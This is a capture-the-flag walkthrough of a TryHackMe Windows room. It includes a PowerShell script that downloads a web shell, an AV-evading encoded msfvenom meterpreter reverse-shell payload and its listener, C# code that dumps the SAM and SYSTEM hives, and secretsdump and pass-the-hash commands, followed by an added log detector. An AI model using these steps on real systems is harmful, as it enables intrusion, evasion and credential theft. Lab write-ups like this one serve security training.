
👀 Stealth - TryHackMe Walkthrough / Writeup

Shortest Path to Admin, AV Bypass using msfvenom and meterpreter and more.

Room Link
Be like a stealth bomber


Recon

Using an nmap scan for initial recon. I will spare you the delay of looking for open ports :)

nmap -sCV -Pn -p 139,445,3389,5985,8443,8000,8080,47001,49668,49665,49667,49669,49664,49676,49666 -vvv -T4 10.10.255.147
nmap scan output
PORT      STATE SERVICE       REASON  VERSION
139/tcp   open  netbios-ssn   syn-ack Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds? syn-ack
3389/tcp  open  ms-wbt-server syn-ack Microsoft Terminal Services
| ssl-cert: Subject: commonName=HostEvasion
| Issuer: commonName=HostEvasion
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-07-28T19:06:15
| Not valid after:  2024-01-27T19:06:15
| MD5:   110c:1c21:e230:b7c7:41f5:4b6a:bf2b:9e6a
| SHA-1: 34ad:3702:1a0a:2054:88a9:ea0c:820b:da64:b1bd:fb56
|_ssl-date: 2023-11-29T11:43:47+00:00; 0s from scanner time.
| rdp-ntlm-info: 
|   Target_Name: HOSTEVASION
|   NetBIOS_Domain_Name: HOSTEVASION
|   NetBIOS_Computer_Name: HOSTEVASION
|   DNS_Domain_Name: HostEvasion
|   DNS_Computer_Name: HostEvasion
|   Product_Version: 10.0.17763
|_  System_Time: 2023-11-29T11:43:09+00:00
5985/tcp  open  http          syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
8000/tcp  open  http          syn-ack PHP cli server 5.5 or later
|_http-title: 404 Not Found
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
8080/tcp  open  http          syn-ack Apache httpd 2.4.56 ((Win64) OpenSSL/1.1.1t PHP/8.0.28)
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
|_http-server-header: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
|_http-title: PowerShell Script Analyser
8443/tcp  open  ssl/http      syn-ack Apache httpd 2.4.56 ((Win64) OpenSSL/1.1.1t PHP/8.0.28)
|_ssl-date: TLS randomness does not represent time
|_http-server-header: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
| ssl-cert: Subject: commonName=localhost
| Issuer: commonName=localhost
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2009-11-10T23:48:47
| Not valid after:  2019-11-08T23:48:47
| MD5:   a0a4:4cc9:9e84:b26f:9e63:9f9e:d229:dee0
| SHA-1: b023:8c54:7a90:5bfa:119c:4e8b:acca:eacf:3649:1ff6
| tls-alpn: 
|_  http/1.1
|_http-title: PowerShell Script Analyser
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
47001/tcp open  http          syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc         syn-ack Microsoft Windows RPC
49665/tcp open  msrpc         syn-ack Microsoft Windows RPC
49666/tcp open  msrpc         syn-ack Microsoft Windows RPC
49667/tcp open  msrpc         syn-ack Microsoft Windows RPC
49668/tcp open  msrpc         syn-ack Microsoft Windows RPC
49669/tcp open  msrpc         syn-ack Microsoft Windows RPC
49676/tcp open  msrpc         syn-ack Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 16378/tcp): CLEAN (Timeout)
|   Check 2 (port 39114/tcp): CLEAN (Timeout)
|   Check 3 (port 33647/udp): CLEAN (Timeout)
|   Check 4 (port 36849/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
|_clock-skew: mean: 0s, deviation: 0s, median: 0s
| smb2-time: 
|   date: 2023-11-29T11:43:13
|_  start_date: N/A

OK, as you can see there are a lot of open ports, but we will only focus on port 8080, as that is the only way in for initial access (unless you found something else).

Visiting http://target:8080 presents us with the following page.

file upload section

Since this is a Windows server, we will upload a PowerShell file that, when executed, downloads a web shell for us into C:\xampp\htdocs.

You may choose any web shell you like; my personal favorite is p0wny Shell.

download the file in your current directory

Create a PowerShell script that will download the shell into the htdocs directory.

getShell.ps1
# Specify the URL to download the file from
$url = "http://YOUR_IP/shell.php"

# Specify the local path to save the downloaded file
$localPath = "C:\xampp\htdocs\shell.php"

# Download the file and save it locally
Invoke-WebRequest -Uri $url -OutFile $localPath

Before we deliver it, start the HTTP server that will serve shell.php:

python -m http.server 80

Now upload our getShell.ps1 file and wait for it to fetch our shell.php.

wait for it to execute

Once done, you can reach the web shell at http://targetip:8080/shell.php

access the shell

Weaponization

As you can see, we have local account access. Now we can create a reverse shell payload, an encoded one to avoid AV detection. But why, when we already have a web shell? Because....

Use the following command to generate an msfvenom payload. If you are using your own choice of encoder, make sure it is x64.

rev.exe
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=YOUR_IP LPORT=YOUR_PORT -f exe -o rev.exe -e x64/zutto_dekiru

Notice the encoder I am using, selected with -e x64/zutto_dekiru.

You may generate the commands from revshells.com, but make sure you are using encoders. This generates a rev.exe file for us. Before we deliver it to the target, start the msfconsole listener.

msfconsole
msfconsole -q -x "use multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set lhost YOUR_IP; set lport YOUR_PORT; exploit"

Delivery

Once we are all done with the setup, use the web shell to deliver the payload and execute it to get the shell.

execute the shell

And you should receive the connection in no time.

meterpreter session

You may check the uid first, to confirm whether it is evader or not.

Then check what kind of privileges you have by executing getprivs.

getprivs

Now, if you look carefully, we have SeImpersonatePrivilege enabled for us.


Exploitation ( Automatic )

I will divide the exploitation part into two categories: one is automated with msfconsole, and the other is exploiting the system manually.

Let's get started. The first is very simple; just execute: getsystem

And you should have admin access.

getsystem

Theory on why this one worked in the first place

I think that since we are using an encoded agent, it avoids detection by AV; the payload might not be touching the disk at all but running in memory, to avoid getting flagged.

Exploitation ( Manual Method )

Once you have a web shell, enumerate the box to check whether a .NET compiler is available to us or not.

.NET Compiler

The next prerequisite is to check whether you have SeImpersonatePrivilege enabled or not. Use the following command.

whoami /priv
SeImpersonatePrivilege

OK, now for the final showdown. We don't need a reverse shell; we will compile an exploit locally on the system, along with another C# program that calls reg.exe to dump the SAM and SYSTEM hives.

First, let's download the exploit code onto our machine.

download the exploit code from here

Create another program, backup.cs, using the code below.

backup.cs
using System;
using System.Diagnostics;

class Program
{
    static void Main()
    {
        // Save both hives into the web root so they can be fetched over HTTP.
        // The second save only runs if the first one succeeded.
        bool ok = ExecuteCommand("reg.exe", "save HKLM\\SYSTEM C:\\xampp\\htdocs\\system.bak")
               && ExecuteCommand("reg.exe", "save HKLM\\SAM C:\\xampp\\htdocs\\sam.bak");

        Console.WriteLine(ok ? "Backup completed successfully." : "Backup failed.");
    }

    // Runs a command without a window, captures stdout and stderr, and
    // returns true only if the process exited with code 0.
    static bool ExecuteCommand(string command, string arguments)
    {
        Process process = new Process();
        process.StartInfo.FileName = command;
        process.StartInfo.Arguments = arguments;
        process.StartInfo.UseShellExecute = false;
        process.StartInfo.RedirectStandardOutput = true;
        process.StartInfo.RedirectStandardError = true;   // reg.exe reports errors on stderr
        process.StartInfo.CreateNoWindow = true;

        process.Start();

        // Drain both streams before waiting; reg.exe output is small, so
        // reading them one after the other is safe here.
        string output = process.StandardOutput.ReadToEnd();
        string error = process.StandardError.ReadToEnd();

        process.WaitForExit();

        if (process.ExitCode != 0)
        {
            Console.WriteLine("Error (" + command + " " + arguments + "): " + output + error);
        }
        return process.ExitCode == 0;
    }
}

Now upload both source files to the target system using the web shell.

upload the files

Now finally compile them using the following commands.

# For exploit.cs
C:\Windows\Microsoft.Net\Framework\v4.0.30319\csc.exe exploit.cs -nowarn:1691,618
# For backup.cs
C:\Windows\Microsoft.Net\Framework\v4.0.30319\csc.exe backup.cs

Once done, execute them as follows.

.\exploit.exe backup.exe
exploit

If you see "Backup completed successfully.", then all is well.

check for the bak files

If you see the .bak files being generated, let's get them.

wget http://TARGET_IP:8080/system.bak
wget http://TARGET_IP:8080/sam.bak

Dump the hashes

impacket-secretsdump -sam sam.bak -system system.bak local
Get the hash

Now use Evil-WinRM to access the box as admin via the pass-the-hash technique.

evil-winrm -u Administrator -H ADMIN_HASH -i TARGET_IP
Evil-WinRm
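As an added example (not from the writeup or the room), here is a small Python detector for the events this chain leaves behind on the target: the PowerShell download into C:\xampp\htdocs from the initial access step, csc.exe compiling a .cs file inside the web root, and reg.exe saving the SAM/SYSTEM hives. The log lines are constructed in a key="value" shape modelled on Sysmon Event ID 1 / Security 4688 and PowerShell 4104 events; the field names and the http://ATTACKER host are assumptions.

```python
import re

# Each rule: name, pattern the process Image must match (None = any), and
# patterns that must ALL appear in the event text. Text is CommandLine +
# CurrentDirectory + ScriptBlockText, so one rule shape covers Sysmon 1 /
# Security 4688 process events and PowerShell 4104 script-block events.
WEBROOT = r"C:\\xampp\\htdocs"  # web root used throughout this room
RULES = [
    ("webroot-drop-via-powershell", None,
     [r"Invoke-WebRequest|DownloadFile|DownloadString", r"-OutFile\s+" + WEBROOT]),
    ("csc-compile-in-webroot", r"\\csc\.exe$", [r"\.cs\b", WEBROOT]),
    ("registry-hive-save", r"\\reg\.exe$", [r"\bsave\s+HKLM\\(SAM|SYSTEM|SECURITY)\b"]),
]
FIELD_RE = re.compile(r'(\w+)="([^"]*)"')

def parse_event(line):
    """Turn one key="value" log line into a dict (constructed log format)."""
    return dict(FIELD_RE.findall(line))

def match_rules(event):
    """Return the names of every rule the event satisfies."""
    image = event.get("Image", "")
    text = " ".join(event.get(k, "") for k in
                    ("CommandLine", "CurrentDirectory", "ScriptBlockText"))
    hits = []
    for name, image_re, text_res in RULES:
        if image_re and not re.search(image_re, image, re.I):
            continue
        if all(re.search(p, text, re.I) for p in text_res):
            hits.append(name)
    return hits

def scan(lines):
    """Return (user, rule) pairs for every event that fires a rule."""
    out = []
    for line in lines:
        ev = parse_event(line)
        out.extend((ev.get("User", "?"), r) for r in match_rules(ev))
    return out

# Constructed sample events shaped like the steps of this writeup.
SAMPLE_LOG = [
    'EventID="4104" User="HOSTEVASION\\evader" ScriptBlockText="Invoke-WebRequest -Uri http://ATTACKER/shell.php -OutFile C:\\xampp\\htdocs\\shell.php"',
    'EventID="1" User="HOSTEVASION\\evader" Image="C:\\Windows\\Microsoft.Net\\Framework\\v4.0.30319\\csc.exe" CommandLine="csc.exe backup.cs" CurrentDirectory="C:\\xampp\\htdocs\\"',
    'EventID="1" User="NT AUTHORITY\\SYSTEM" Image="C:\\Windows\\System32\\reg.exe" CommandLine="reg.exe save HKLM\\SAM C:\\xampp\\htdocs\\sam.bak"',
    'EventID="1" User="HOSTEVASION\\evader" Image="C:\\Windows\\System32\\reg.exe" CommandLine="reg.exe query HKLM\\SOFTWARE\\Microsoft"',
]

if __name__ == "__main__":
    for user, rule in scan(SAMPLE_LOG):
        print(f"{rule:30} {user}")
```

The benign reg.exe query in the last sample line is there to show the hive-save rule does not fire on ordinary registry reads.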

Get User Flag


The user flag is encoded in base64. Use the following command to decode.

# Download the flag on your own computer and use the following command
cat encodedflag | head -n -1 | tail -n +2 | base64 -d
It will give you a link to an endpoint that contains a message about how to get the flag.
The message hints that we should remove the log file in the uploads directory.

Remove the following log file

log file location

Then reload the endpoint to get the flag!

User Flag

Get Admin Flag


Theory on why the manual method works

A few years ago, I wrote a simple C program to print hello world, and I thought to myself: how can I publish it and share it with others? So I compiled it on my Windows machine and executed it. It worked without any issues. But as soon as I ran it on a different computer, or even a VM, Defender/UAC kicked in and flagged it as malicious, as it did not have any valid digital certificate. Imagine a simple hello world getting flagged by the AV.

It was not the same with a Java program: I wrote a simple hello world, created a jar file, and executed it on a different machine, and it worked without any issues. Since it ran via Java, a trusted binary, it did not have any issues.

So in this room, when we compile an actual exploit, Defender does not find it suspicious, because it thinks the user is not mad enough to break the system. The same goes for the backup.cs file. But if you compile the program without signing it with a valid digital certificate, it might get flagged on a different machine, even if it is running Windows 10 Home Edition. Now, if you think there might be a different reason, please feel free to share it with me.

Credits to my friends for helping me research on this room

1st Person

For giving me the idea of compiling the exploit

Check out 0xb0b's writeup : https://0xb0b.gitbook.io/writeups/tryhackme/2023/stealth

2nd Person

For giving me the idea of exploitation via Metasploit

Thank you for reading my article ❤️ Happy Hunting 😎, feel free to connect with me on LinkedIn
